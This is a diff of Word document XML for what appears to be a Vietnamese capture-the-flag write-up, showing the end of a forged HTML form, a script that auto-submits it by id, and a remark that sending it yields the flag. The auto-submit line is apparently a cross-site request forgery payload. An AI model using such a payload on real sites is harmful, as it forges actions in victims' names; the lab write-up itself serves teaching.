+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> checked</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>form</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>document</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="666666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="DF4A68"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>getElementById</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="666666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>kiet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="666666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="DF4A68"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>submit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="666666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>();</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="791E5DCF" wp14:editId="1F43ECC4">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="627396920" name="Picture 1" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="627396920" name="Picture 1" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Gửi đi và ta nhận được flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43F28DC6" wp14:editId="2C174170">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="49277394" name="Picture 1" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="49277394" name="Picture 1" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -497,6 +1414,11 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="token">
+    <w:name w:val="token"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00F026E3"/>
+  </w:style>
 </w:styles>
 </file>
 
